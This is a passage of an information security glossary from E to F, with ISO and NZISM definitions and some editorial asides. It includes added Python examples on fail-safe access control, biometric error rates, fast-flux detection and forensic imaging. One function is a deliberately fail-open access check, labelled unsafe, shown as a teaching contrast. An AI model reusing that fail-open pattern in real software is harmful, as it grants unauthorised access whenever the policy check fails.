Certification authorities may conduct additional checks on applicants for their digital certificates, typically offering the resulting ‘EV’ certificates at a higher price reflecting the additional costs and trustworthiness.  They typically confirm the identity and legal status of the applicant organisation with the relevant national authorities – a kind of corporate background check – as required by the CA/Browser Forum, an industry body.  Several inappropriate certification incidents (mis-issuance) call into question the value of voluntary compliance with an industry code in this area, leading to calls for stronger oversight, tighter regulation and accreditation, if not a complete overhaul of the certification business.  Since 2019 the major browsers no longer display a distinctive EV indicator in the address bar, further limiting the practical value of EV certificates to end users.


Person who evaluates (checks, tests and compares) something against expectations, requirements or criteria.  “Individual assigned to perform evaluations in accordance with a given evaluation standard and associated evaluation methodology. Note: An example of an evaluation standard is ISO/IEC 15408 with the associated evaluation methodology given in ISO/IEC 18045” (ISO/IEC 19896-1:2018).


Generally, a trivial or benign form of incident, possibly just a small part of a developing situation (perhaps a symptom, indicator, flag or forewarning).  For example, while an event such as a single logon failure may simply result from someone forgetting or mistyping their password, it could be the first indication of a determined brute force attack by hackers.  “Occurrence or change of a particular set of circumstances.  Notes: an event can be one or more occurrences, and can have several causes; an event can consist of something not happening; an event can sometimes be referred to as an ‘incident’ or ‘accident’” (ISO/IEC 27000).  See also information security event.


Information which proves or disproves something.  See also digital evidence and forensic evidence.

Evidence preservation facility

Typically a firesafe, vault, evidence room or similar secure storage facility providing excellent physical protection for forensic evidence.  “Secure environment or a location where collected or acquired evidence is stored.  Note: An evidence preservation facility should not be exposed to magnetic fields, dust, vibration, moisture or any other environmental elements (such as extreme temperature or humidity) that may damage the potential digital evidence within the facility.” (ISO/IEC 27037).

Evil twin

Network hack using a fake/spoofed public Wi-Fi hotspot that forwards traffic from connected devices to a genuine public Wi-Fi hotspot or otherwise to the Internet.  The evil twin silently intercepts/monitors the traffic and has full access to any unencrypted content.  It may also perform man-in-the-middle attacks, surreptitiously manipulating the traffic en route.


Forensic evidence allegedly demonstrating that someone or something was not involved in an incident, clearing them of blame.  Cf. inculpatory.


An extraordinary occurrence, such as an unusual event, an unanticipated (and therefore potentially unhandled) state, condition or data value, or unauthorized noncompliance.  Cf. exemption.  “The formal acknowledgement that a requirement of the NZISM cannot be met and that a dispensation from the particular compliance requirement is granted by the Accreditation Authority.  This exception is valid for the term of the Accreditation Certificate or some lesser time as determined by the Accreditation Authority” (NZ information Security Manual).

Exceptions and waivers

“An exception is NOT the same as a waiver.  An exception means that the requirement need not be followed.  A waiver means that some alternative controls or conditions are implemented” (NZ information Security Manual).


(a) Formal signing demonstrating commitment to a legally-binding contract or agreement by duly authorized signatories. (b) Running a computer program. (c) Capital punishment.

Executive management,
executives, ‘the Execs’,
senior management,
top management,
mahogany row etc.

The most senior managers running the organisation (in conjunction with lower management tiers) on a day-to-day basis, who are ultimately accountable to stakeholders for protecting and exploiting the organisation’s information assets.  On behalf of the organisation’s legal owners and other external stakeholders, the governing body (normally the Board of Directors) gives executives both the obligation or responsibility and the authority or control over the organisation’s resources, for example ensuring that information risks are identified, assessed and treated in accordance with the organisation’s business objectives, through diligence and due care.  In short, the buck stops here.  “Person or group of people who have delegated responsibility from the governing body for implementation of strategies and policies to accomplish the purpose of the organisation.  Note: executive management is sometimes called top management and can include Chief Executive Officers, Chief Information Officers, Chief Financial Officers and similar roles” (ISO/IEC 27000).


Noncompliance explicitly authorized by the relevant authority after due consideration and consultation with information risk and security experts.  Normally limited in duration as well as scope, and compensating controls may be mandated.  The person requesting an exemption (normally the Information Asset Owner or Risk Owner) remains personally accountable for the residual risk and any consequential incidents.  Cf. exception.


Covert extraction of sensitive/valuable information assets from a supposedly secure system, device, network or organisation.  Normally implies that the information is being ‘pushed out’ or ‘carried out’ by an agent within (a person or malware), but it may also be ‘pulled out’ by someone on the outside (a social engineer, hacker etc.).  Cf. infiltration.

Exit strategy

Whereas normally we consider the risks when going into a new situation, there may also be substantial risks involved in staying there and/or in getting out.  With cloud computing for example, a breakdown in the relationship with the CSP may lead to problems for the organisation in retrieving its information and transferring the service to another CSP or in-house.  Preparing a strategy for exiting the relationship gracefully is a form of business continuity management, part of risk management.


The intangible knowledge, wisdom, competence and/or skill that accumulates as one does something repeatedly.  A valuable information asset.  “Involvement at a practical level with projects related to the field of competence” (ISO/IEC 19896-1:2018).

Expert witness

Person acknowledged to have extensive experience and skill in specialized subjects such as information security or forensics, capable of analysing, presenting and interpreting the facts objectively for the court.  Offers an informed, dispassionate, unbiased opinion on complex forensic evidence.


Verb: to take advantage of or use.  Although in the information security domain the term usually implies a negative, unethical, unwelcome, inappropriate, unauthorized or harmful activity, it can also be positive (e.g. an organisation legitimately exploits its assets and capabilities to achieve its business objectives).  Noun: the hacking program, malware payload, script, tool and/or process used by a threat agent to take advantage of a security vulnerability.  “Sploit” is a leet form.

Exploit kit

See crimeware.


The degree to which a vulnerability could be exploited by a threat.  For example, security vulnerabilities caused by bugs in Internet-facing web servers tend to be far more exposed to hacking than those affecting internal corporate systems, with several layers of protection between them and external hackers.


Outside the organisation’s physical, organisational and network boundary.  Cf. internal.

External context

“External environment in which the organisation seeks to achieve its objectives.  Notes: external context can include the following: the cultural, social, political, legal, regulatory, financial, technological, economic, natural and competitive environment, whether international, national, regional or local; key drivers and trends having impact on the objectives of the organisation; and relationships with, and perceptions and values of, external stakeholders.” (ISO Guide 73).

External party

Term used in the ISO27k standards as a synonym for ‘third party’.  External implies either a separate organisation or a part of the same organisation that is outside the scope of its ISMS.


Manual or automated device for putting out fires using an extinguishant gas (such as carbon dioxide, nitrogen or FM-200), liquid (such as water), foam, powder or cloth (fire blanket).  May be portable/hand-held, mounted to a vehicle, or permanently installed within a facility.  A corrective control.


The use of coercion (typically involving threats of cybertage, disclosure of confidential information or denial of service through ransomware, or physical harm) to obtain assets (generally money) from a target individual or organisation.


“Extension of an organisation's Intranet, especially over the public network infrastructure, enabling resource sharing between the organisation and other organisations and individuals that it deals with by providing limited access to its Intranet.  Note: For example, an organisation's customers can be provided access to some part of its Intranet, creating an extranet, but the customers cannot be considered ‘trusted’ from a security standpoint.” (ISO/IEC 27033-1).


A legal principle that potentially gives the authorities powers over foreigners outside their normal jurisdiction, for example prosecuting and penalizing non-European organisations for failing to comply with GDPR by protecting the privacy rights of EU citizens whose personal information they obtain.


Someone whose views or ideology are way out of line with the general population.  Between activist and terrorist on a notional threat scale.


Unauthorized transfer of information from the internal to external environments, typically using network connections and/or various covert channels or methods such as a drop.  Cf. intrusion.


Site, installation, building, room etc.  “An area that facilitates government business.  For example, a facility can be a building, a floor of a building or a designated area on the floor of a building” (NZ information Security Manual).

Failover, fail-over

Manual or automated process for transferring resilient ICT services between redundant equipment, campuses and/or network routes, providing high availability, hopefully averting more serious incidents.  “The capability to switch over automatically (typically without human intervention or warning) to a redundant or standby information system upon the failure or abnormal termination of the previously active system” (CNSSI-4009).


Engineering concept used heavily in safety-critical or other high-security system and process designs whereby a control failure or adverse situation leaves the system/process in an inherently safe or secure – albeit perhaps only partially functional – state or condition.


Resilience arrangement whereby a system or process degrades gracefully, shedding nonessential functions rather than failing outright.  See also load-shedding.  “Selective termination of affected nonessential processing when hardware or software failure is determined to be imminent” (CNSSI-4009).


Undesirable state for systems and processes that have not been explicitly designed to be safe and secure (i.e. failsafe) under all conditions, and hence are ‘fragile’.  For example, an access control that fails spontaneously, or is actively disabled or bypassed in an attack, may permit inappropriate access that it was supposed to have prevented or at least detected.  In the absence of compensating controls, security by obscurity can fail spectacularly if details of a supposedly obscure vulnerability are widely disclosed.
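
As an added illustration (not part of the glossary), here is the same authorisation check written first fail-open and then fail-safe in Python.  The policy store, the users and the actions are constructed for the example, and the outage is simulated by a flag rather than a real back-end:

```python
"""Added example: a fail-open access check beside its fail-safe (deny-on-error) form.
The policy store, users and actions are constructed for illustration."""

import logging

logging.basicConfig(level=logging.WARNING)
log = logging.getLogger("authz")


class PolicyStoreUnavailable(Exception):
    """Raised when the (hypothetical) policy back-end cannot be reached."""


# Constructed policy: which user may perform which action.
POLICY = {
    "alice": {"read"},
    "bob": {"read", "write"},
}


def lookup_permission(user, action, store_available=True):
    """Consult the policy store; unknown users get no permissions."""
    if not store_available:
        raise PolicyStoreUnavailable("policy store unreachable")
    return action in POLICY.get(user, set())


def is_authorised_fail_open(user, action, store_available=True):
    """UNSAFE: an outage in the control turns into universal access."""
    try:
        return lookup_permission(user, action, store_available)
    except PolicyStoreUnavailable:
        log.warning("policy store down; allowing %s to %s", user, action)
        return True  # the control fails and the system falls open


def is_authorised_fail_safe(user, action, store_available=True):
    """Fail-safe: any error, including unexpected ones, is treated as 'deny'.

    The service may be only partially functional during the outage, but it
    never grants access it cannot justify."""
    try:
        return bool(lookup_permission(user, action, store_available))
    except Exception as exc:  # deliberately broad: deny on anything unexpected
        log.warning("policy store error (%s); denying %s to %s", exc, user, action)
        return False


if __name__ == "__main__":
    for name, check in (("fail-open", is_authorised_fail_open),
                        ("fail-safe", is_authorised_fail_safe)):
        print(name, "normal:", check("alice", "write"),
              "outage:", check("mallory", "write", store_available=False))
```

During the simulated outage the fail-open version lets an unknown user write, while the fail-safe version denies everyone until the policy store is back, which is the partially-functional-but-secure state the failsafe entry describes.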

(Factor Analysis of
Information Risk)

The Open Group’s structured risk analysis method, which examines various parameters (factors) to estimate the magnitude and probability of losses and hence risk.

Fair use

Copyright laws generally permit limited use of copyright materials without the intellectual property owner’s explicit permission.  Such fair use exemptions typically allow reproduction (such as quoting and summarizing) of non-substantial or inconsequential parts of copyright materials for limited research and educational purposes, or to create backup/archive copies.


Sometimes described as ‘blind trust’ or ‘wishful thinking’, faithful people believe in something without evidence of its validity and veracity, sometimes to the point of ignoring or flatly and irrationally denying credible evidence to the contrary.  Faith is not a control but a potentially harmful form of delusion, manipulation, coercion or social engineering.


Spoofed item that misrepresents the genuine article.  See also counterfeit.

Fake news

Propaganda in the form of fabricated ‘news’ stories circulated online through websites and social media, with the specific aim of misleading and influencing (coercing) the general population.  Fake news stories are also used as clickbait.


Use of robustness, resilience, redundancy and/or failover features in a system or process to continue to deliver limited critical services under emergency conditions when the primary mechanisms have been compromised in an incident.  A form of contingency planning.  See also failover.

False acceptance,
type II error

Authentication failure in which an impostor is incorrectly accepted as, or associated with, someone else’s identity.  Conventionally termed a type II error in biometrics (the statistical null hypothesis being that the claimed identity is genuine).  Cf. false rejection.

False Acceptance Rate

Commonplace metric for a biometric system, measuring the proportion of authentications that exhibit type II errors.  “The measure of the likelihood that the biometric security system will incorrectly accept an access attempt by an unauthorized user.  A system’s false acceptance rate typically is stated as the ratio of the number of false acceptances divided by the number of identification attempts.” (CNSSI-4009).  See also False Rejection Rate.

False flag

An attempt to get an attack attributed to an innocent party, deflecting blame from the perpetrator while denigrating the accused.

False rejection,
type I error

Authentication failure in which the system denies or fails to confirm a genuine person’s true identity.  Conventionally termed a type I error in biometrics.  Cf. false acceptance.

False Rejection Rate

Commonplace metric for a biometric system, measuring the proportion of authentications that exhibit type I errors.  “The measure of the likelihood that the biometric security system will incorrectly reject an access attempt by an authorized user.  A system’s false rejection rate typically is stated as the ratio of the number of false rejections divided by the number of identification attempts.” (CNSSI-4009).  See also False Acceptance Rate.
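
The two rates above trade off against each other through the matcher’s decision threshold.  As an added example (not from the glossary, and going slightly beyond it), the Python below computes FAR and FRR from constructed genuine and impostor match scores and finds the crossover threshold at which the two rates are equal; the scores and the 0–100 scale are assumptions for illustration:

```python
"""Added example: FAR, FRR and the crossover (equal error) rate of a
score-based biometric matcher, using constructed match scores."""

# Constructed similarity scores (0-100) from a hypothetical matcher.
# Higher means "more like the enrolled template".
GENUINE_SCORES = [91, 88, 85, 83, 80, 77, 74, 70, 66, 60]   # enrolled user, own attempts
IMPOSTOR_SCORES = [62, 55, 50, 47, 44, 41, 38, 33, 28, 20]  # other people's attempts


def false_acceptance_rate(impostor_scores, threshold):
    """Share of impostor attempts accepted because score >= threshold (type II errors)."""
    accepted = sum(1 for s in impostor_scores if s >= threshold)
    return accepted / len(impostor_scores)


def false_rejection_rate(genuine_scores, threshold):
    """Share of genuine attempts rejected because score < threshold (type I errors)."""
    rejected = sum(1 for s in genuine_scores if s < threshold)
    return rejected / len(genuine_scores)


def error_curve(genuine_scores, impostor_scores, thresholds):
    """(threshold, FAR, FRR) for each candidate decision threshold."""
    return [
        (t, false_acceptance_rate(impostor_scores, t), false_rejection_rate(genuine_scores, t))
        for t in thresholds
    ]


def crossover_point(genuine_scores, impostor_scores, thresholds=range(0, 101)):
    """Threshold at which FAR and FRR are closest: the crossover / equal error rate.

    Ties resolve to the lowest such threshold."""
    return min(error_curve(genuine_scores, impostor_scores, thresholds),
               key=lambda row: (abs(row[1] - row[2]), row[0]))


if __name__ == "__main__":
    for t in (40, 61, 90):
        print(f"threshold {t}: FAR={false_acceptance_rate(IMPOSTOR_SCORES, t):.2f} "
              f"FRR={false_rejection_rate(GENUINE_SCORES, t):.2f}")
    print("crossover:", crossover_point(GENUINE_SCORES, IMPOSTOR_SCORES))
```

Raising the threshold drives FAR towards zero at the cost of locking out more legitimate users; a high-security deployment sits to the right of the crossover point, a convenience-oriented one to the left.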

False sense of security

Vulnerability involving an unwarranted and inappropriate faith in the security/control arrangements stemming from inadequate assurance and naïveté – for example, believing that antivirus software totally prevents malware incidents.

Fast-flux DNS,
fast-flux botnet

Black hat high-availability and concealment technique in which the DNS records for a malicious domain are changed very frequently (using very short TTLs) to point at any of a large, constantly rotating set of compromised hosts acting as proxies for the real command-and-control or content servers.  Even if individual proxies or IP addresses are taken down by the authorities, others remain reachable and the true back-end stays hidden.  ‘Double flux’ also rotates the authoritative name servers themselves.  Legitimate content delivery networks likewise use short TTLs and many addresses, so detection normally combines TTL, address and network diversity with reputation data rather than relying on any one signal.
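
As an added example (not from the glossary), the following Python scores domains for fast-flux behaviour from passive-DNS style observations.  The observations, domain names and thresholds are constructed; a /24 prefix count stands in for the ASN diversity a real detector would use:

```python
"""Added example: flagging fast-flux candidates from passive-DNS style
observations (domain, TTL, resolved address). Data are constructed."""

import ipaddress
from collections import defaultdict
from statistics import mean

# Constructed observations of A-record answers seen over a few hours.
# Documentation address ranges (RFC 5737) stand in for real hosts.
OBSERVATIONS = [
    ("update-check.example", 60, "203.0.113.10"),
    ("update-check.example", 60, "198.51.100.7"),
    ("update-check.example", 120, "192.0.2.44"),
    ("update-check.example", 60, "203.0.113.77"),
    ("update-check.example", 90, "198.51.100.200"),
    ("update-check.example", 60, "192.0.2.9"),
    ("www.example.org", 3600, "192.0.2.1"),
    ("www.example.org", 3600, "192.0.2.1"),
    ("cdn.example.net", 300, "203.0.113.5"),
    ("cdn.example.net", 300, "203.0.113.6"),
]


def summarise(observations):
    """Per-domain address diversity and TTL behaviour."""
    seen = defaultdict(lambda: {"ips": set(), "prefixes": set(), "ttls": []})
    for domain, ttl, ip in observations:
        prefix = ipaddress.ip_network(f"{ip}/24", strict=False)  # crude stand-in for ASN diversity
        seen[domain]["ips"].add(ip)
        seen[domain]["prefixes"].add(str(prefix))
        seen[domain]["ttls"].append(ttl)
    return {
        domain: {
            "distinct_ips": len(s["ips"]),
            "distinct_prefixes": len(s["prefixes"]),
            "mean_ttl": mean(s["ttls"]),
        }
        for domain, s in seen.items()
    }


def looks_fast_flux(stats, max_ttl=300, min_ips=5, min_prefixes=3):
    """Short TTLs plus many addresses spread across many networks."""
    return (stats["mean_ttl"] <= max_ttl
            and stats["distinct_ips"] >= min_ips
            and stats["distinct_prefixes"] >= min_prefixes)


def flagged_domains(observations, **thresholds):
    """Domains whose summary crosses every threshold, sorted for stable output."""
    return sorted(d for d, s in summarise(observations).items()
                  if looks_fast_flux(s, **thresholds))


if __name__ == "__main__":
    for domain, stats in summarise(OBSERVATIONS).items():
        print(domain, stats, "FLUX" if looks_fast_flux(stats) else "")
```

The CDN-like domain has a short TTL but only two neighbouring addresses, so it is not flagged; in production the thresholds need tuning against known-good CDN traffic and the prefix check should be replaced by ASN or country diversity.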


Problem with information processing or communications systems including a security incident, complete or partial system failure (outage), program error/bug, virus, or some other generally unanticipated and undesirable mode of operation etc.

Fault tolerance

High-availability design goal that systems should survive faults and other incidents that would otherwise cause failures or unplanned outages.  A strong but highly specific form of resilience.

Fax machine

“A device that allows copies of documents to be sent over a telephone network” (NZ information Security Manual).

  No kidding!

(Federal Bureau of Investigation)

Spooky US government agency responsible for federal law enforcement, counterintelligence and domestic intelligence/surveillance, including surveillance deliberately targeting US citizens.  Shaped (though not founded) by J Edgar Hoover, its director from 1924 to 1972.  See also CIA and DHS.

(Federal Risk and Authorization Management Program)

US program imposing good practice security standards (principally NIST SP800-53) on the suppliers of cloud computing services for government use.

Femto cell,
home cell,
small cell

A cellphone repeater or base station providing cellular service in a limited local area, typically within a building, where the conventional cellular coverage is limited or non-existent.  “Small, low-power cellular base station.  Note: A femto cell is typically designed for use in a home or small businesses” (ISO/IEC 27033-6).

Fibre channel,
fiber channel

“Serial I/O interconnect capable of supporting multiple protocols, including access to open system storage, access to mainframe storage, and networking.  Note: Fibre Channel supports point to point, arbitrated loop, and switched topologies with a variety of copper and optical links running at speeds from 1 gigabit per second to over 10 gigabits per second” (ISO/IEC 27040).

Fibre channel interconnect

“Serial Small Computer System Interface (SCSI) transport protocol used on Fibre Channel interconnects” (ISO/IEC 27040).

Fidelity insurance,
fidelity bond

Insurance against the costs and losses to an organisation arising from incidents involving deliberate acts of disloyalty or dishonesty by its workers or agents (e.g. advisors and other service providers).


A responsibility based on trust and ethics, for example officers of an organisation are legally and morally required, obliged or bound to act in the best interests of the organisation’s owners and other stakeholders, even if doing so conflicts with their personal interests.  See also malfeasance, due care and fidelity insurance.

Fileless malware

Memory-resident malware that runs in RAM and abuses legitimate, pre-installed apps and utilities such as web browsers, PowerShell and WMI (‘living off the land’), leaving few or no distinctive malware files on an infected system’s disks for antivirus scanners or forensic analysts to find.  Obfuscated or Base64-encoded PowerShell commands, such as those generated by PowerSploit, may not be detected reliably by antivirus packages.  Persistence is often achieved through registry entries, scheduled tasks or WMI event subscriptions rather than dropped executables, so hunting relies on process-creation and script-block logging and on memory forensics rather than on disk scans.

Filing system

Structured, systematic, organised and usually indexed or catalogued arrangement for information storage, search, retrieval and referencing.  “Any structured set of personal data which are accessible according to specific criteria, whether centralised, decentralised or dispersed on a functional or geographical basis” (GDPR).


“A device that controls the flow of data in accordance with a security policy” (NZ information Security Manual).


“Process of accepting or rejecting data flows through a network, according to specified criteria” (ISO/IEC 27033-1).


Literally, the print mark left behind on a surface by a finger, a biometric.  Often used figuratively to indicate characteristics that uniquely identify a person (e.g. using DNA profiling), system or data.  Despite theoretical claims as to their uniqueness, gathering and analysing any kind of fingerprint creates practical constraints on the scientific accuracy, hence there is a small but finite possibility that fingerprints from different individuals, systems or data may fail to be distinguished in practice.  Furthermore, being biometrics, confidentiality is a challenge for the owner and they cannot be changed if compromised.  See also hash.

FIPS 197 (Federal Information Processing Standard № 197)

Standard published by NIST in 2001 specifying AES.  See


Along with smoke, one of many physical security threats, whether caused by accident or intentionally (arson).  See also flood, intruder and malicious damage.


One of several nasty species of malware in the wild in 2018.  A browser hijacker and downloader.


Specialized network router or appliance specifically configured as a security gateway monitoring, controlling and filtering traffic between network segments, nodes and devices according to a set of access control rules, normally with a default-deny rule blocking anything not explicitly permitted.  “Type of security barrier placed between network environments -- consisting of a dedicated device or a composite of several components and techniques -- through which all traffic from one network environment traverses to another, and vice versa, and only authorized traffic, as defined by the local security policy, is allowed to pass” (ISO/IEC 27033-1).  “A network protection device that filters incoming and outgoing network data, based on a series of rules” (NZ information Security Manual).

  See also packet filter, stateful firewall and deep packet inspection.


Software loaded into a memory chip or similar hardware device, normally embedded in hardware interfaces to control and communicate with specialist devices such as plant controllers, disk drives or network cards.  The BIOS on a computer motherboard is an example.  “Software embedded in a hardware device” (NZ information Security Manual).

(Foreign Intelligence Surveillance Act)

US law unilaterally permitting the US government to snoop on foreigners’ information for US intelligence, counterterrorism and (presumably) cyberwarfare, economic, political or other purposes.  Became law in 1978, amended in 2008.  Established the Foreign Intelligence Surveillance Court as a SECRET oversight body to mediate official access requests by the NSA, CIA, FBI or other agencies/authorities.

(Federal Information Security Management Act)

US law imposing information risk-based security and privacy obligations on government agencies and, to some extent, their suppliers.  “A statute (Title III, P.L. 107-347) that requires agencies to assess risk to information systems and provide information security protections commensurate with the risk.  FISMA also requires that agencies integrate information security into their capital planning and enterprise architecture processes, conduct annual information systems security reviews of all programs and systems, and report the results of those reviews to OMB.” (CNSSI-4009).

Five Eyes

A strategic alliance/collaboration between the governments of the USA, Canada, UK, Australia and New Zealand to share intelligence capabilities and information.  Evolved from the UKUSA bilateral ‘special arrangement’ that had in effect been in place since WWII or before.  Whereas the security agencies are not supposed to snoop on their own citizens, they can do so via their Five Eyes partners – a convenient means of bypassing the governance control.

Flash memory [media]

Data storage device using a silicon chip as the media, in a manner that retains the data indefinitely without consuming power, such as a USB memory stick.  “A specific type of EEPROM” (NZ information Security Manual).


A fundamental and inherent vulnerability, weakness or failing.  In the context of software security, flaws are generally errors in the system design or architecture that create or expose information security vulnerabilities.  Flaws in corporate governance, risk management, information security management, business continuity management etc. can result in an organisation’s abject failure to characterize and treat reasonably foreseeable (let alone unforeseeable) risks.


(a) A surprisingly common physical security threat.  Due to global warming, the number of natural disasters involving flooding has increased markedly in recent years, while leaking pipes, blocked sewers and sprinkler systems remain as prevalent as ever.  See also fire, intruder and malicious damage. (b) Accidentally overwhelm an IT system or network with a high volume of traffic, for example an abnormally high peak load on a heavily-promoted website or a tsunami of spurious packets generated by a hardware error on a network node. (c) Deliberately overwhelm an IT system or network with large volumes of generated traffic in an attempt to cause a denial of service or to slip a covert attack past failing security controls.

Fly lead

“A lead that connects IT equipment to the fixed infrastructure of the facility. For example, the lead that connects a workstation to a network wall socket” (NZ information Security Manual).


Fire suppressant or extinguishant chemical from DuPont popular in automated fire control systems.

(Failure Mode Effects Analysis)

Structured bottom-up engineering method, pioneered by NASA, to analyse potential reliability, safety or security risks or issues early in the system development lifecycle, identifying how the system might possibly fail (e.g. due to single points of failure).  Used to design more resilient, robust, secure and safe systems.

launch pad
stepping stone,
pivot point

The system initially compromised on a hacked network, from which further probes and attacks may be launched.  May be any vulnerable networked system, including things, multifunction devices, desktops, portables, servers etc.


Explicitly prohibit i.e. withhold consent, authorisation or permission for someone to do something, go somewhere etc. or face the consequences.

Forensic, forensics

Relating to the law courts.  See also digital forensics.  “The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data” (CNSSI-4009).

Forensic copy

More than just a copy of an item of forensic evidence, a forensic copy has been produced by a specific, forensically-sound method that gives an extremely high level of assurance that the copy is an authentic and complete duplicate of the original – for example, a bitwise image of a computer disk, created using a particular set of forensic tools, with a cryptographic hash value identical to the original.  The source is normally read through a write blocker so that the imaging process itself cannot alter it, and the hashes of both source and image are recorded in the chain of custody documentation so that the image can be re-verified at any later stage.
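
As an added example (not from the glossary), the Python below produces a bitwise image of a constructed in-memory ‘disk’, records SHA-256 hashes of source and image in a verification record, and shows that a single flipped bit later breaks verification.  The sample disk contents and the record layout are assumptions for illustration; a real acquisition reads a device through a write blocker rather than a byte string:

```python
"""Added example: producing and verifying a bitwise forensic image with
SHA-256 hashes. The 'disk' is a constructed in-memory byte string."""

import hashlib


def sha256_hex(data, chunk_size=1 << 20):
    """Hash in fixed-size chunks, the way an imaging tool streams a device."""
    h = hashlib.sha256()
    for offset in range(0, len(data), chunk_size):
        h.update(data[offset:offset + chunk_size])
    return h.hexdigest()


def acquire_image(source):
    """Bitwise copy of every byte (allocated or not) plus a verification record.

    A real acquisition reads the source through a write blocker so the
    process itself cannot alter the evidence; here the source is bytes."""
    image = bytes(source)
    record = {
        "size_bytes": len(source),
        "sha256_source": sha256_hex(source),
        "sha256_image": sha256_hex(image),
    }
    record["verified"] = record["sha256_source"] == record["sha256_image"]
    return image, record


def verify_image(image, record):
    """Re-hash the image later (e.g. before analysis or in court) and compare."""
    return (len(image) == record["size_bytes"]
            and sha256_hex(image) == record["sha256_source"])


# Constructed "disk": a boot-sector-like header, slack space, file content, filler.
SAMPLE_DISK = (b"\xeb\x3c\x90MSDOS5.0" + b"\x00" * 4096
               + b"draft memo: do not distribute" + b"\xff" * 512)


def tamper(image, offset=4100):
    """Flip one bit to show that even a single-bit change breaks verification."""
    altered = bytearray(image)
    altered[offset] ^= 0x01
    return bytes(altered)


if __name__ == "__main__":
    image, record = acquire_image(SAMPLE_DISK)
    print(record)
    print("untouched image verifies:", verify_image(image, record))
    print("tampered image verifies:", verify_image(tamper(image), record))
```

Imaging tools normally record two independent hashes (for example MD5 and SHA-256) and the verification is repeated by whoever next takes custody, which is what makes the chain of custody checkable rather than merely asserted.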

Forensic evidence

Evidence destined to be used in court.  The legal system imposes strict integrity requirements on evidence, requiring strong assurance measures such as a valid and unbroken chain of custody.


The fraudster who commits forgery.


Fraudulent counterfeiting of items such as negotiable instruments (e.g. banknotes),  credentials etc.

Fork bomb,

A process (not necessarily malware: the classic example is a one-line shell function) that repeatedly spawns copies of itself, each of which spawns further copies, growing exponentially until it exhausts the process table, memory or CPU and brings the entire system to a halt i.e. a denial of service attack.  Mitigated by per-user process limits (e.g. ulimit -u or cgroup pids limits) rather than by antivirus.

Form grabber, grabber,
form jacking

Malware that captures data entered by the system user into online forms, particularly credentials used for authentication.

(Free Open Source Software)

Software source code that its owner deliberately publishes and permits or encourages others to use, change and ideally improve as a collaborative public effort.  ‘Free’ refers to liberty, not necessarily price: some FOSS suppliers, for example, provide additional chargeable services such as professional support and patching.

(For Official Use Only)

Deprecated US government label applied to unclassified information containing content that may have been exempt from mandatory disclosure under the Freedom of Information Act.  Replaced by CUI.


(a) Falsely yet credibly accuse someone of something untoward, such as a crime, or deflect the blame their way in such a way that they appear guilty whereas the guilty party appears innocent.  An integrity failure.  A form of social engineering.  (b) Permanent wooden or metal structure into which a door or window may be fixed by hinges, catches and locks.  The strength of the frame and its fixture to the surrounding wall are critical to the ability of the door or window to resist brute force attacks, fires, floods etc.  The entire structure, plus the associated processes (such as architecture and design, operation and maintenance), constitutes a physical security control system.


A conceptual or physical structure or skeleton linking related items together, providing a logical basis or foundation for further construction, understanding and use.   May involve models, blueprints, architecture and design specifications, nodes and linkages, systems (such as management systems), methods, approaches, standards, policies, guidelines etc.  May be theoretical or practical.  Information security frameworks typically concern governance, information risk, compliance, privacy and related matters, in whole or in part.

Fraud, con

Theft, misappropriation or similar crime involving deliberate deception or misrepresentation of the target by a fraudster, usually for unfair advantage or illegal gain.  Many forms of fraud are known e.g. assuming someone else’s name and masquerading as them (identity fraud); promising victims a large payout on receipt of an advance fee; causing victims unwittingly to call a premium-rate phone number and so rack-up a large bill (toll fraud); tricking victims into downloading malware or visiting unsavoury/undesirable websites (click bait); falsifying or inflating expenses claimed (expenses fraud); falsifying financial records (accounting or tax fraud); substituting bank account numbers (payment fraud).  See also scam.

Fraud recovery fraud

Follow-on fraud in which fraudsters typically claiming to be lawyers, barristers, police officers etc. promise to help victims of prior frauds recover their losses, prosecute the original fraudsters etc.  Fraud victims have, in effect, already demonstrated their naïveté, gullibility and susceptibility in the earlier incidents and may still be ignorant or in a psychological state of denial, hence being relatively vulnerable to subsequent frauds by selfish heartless exploitative low-life pond scum totally devoid of compassion.

con artist

Deceitful, deceptive person who commits or perpetrates fraud.  Sometimes incorrectly called ‘the fraud’ which, strictly speaking, is the incident not the perpetrator.

Freedom Of Information Act (FOIA)

Laws in many jurisdictions require public bodies to disclose potentially sensitive information under certain conditions, typically for public interest reasons, on request by a member of the public following the prescribed procedures.  When entire documents or data sets are to be disclosed under FOIA, it may be necessary to redact parts e.g. to safeguard ongoing covert operations and operatives (typically informers, moles and spies) or to protect privacy or national security.


Software distributed legitimately free of charge.  Unlike public domain software, freeware normally remains copyrighted and its licence may still restrict modification, redistribution or commercial use; unlike FOSS, the source code is not necessarily available.  ‘Free’ here refers to price, not liberty.

Freezer spray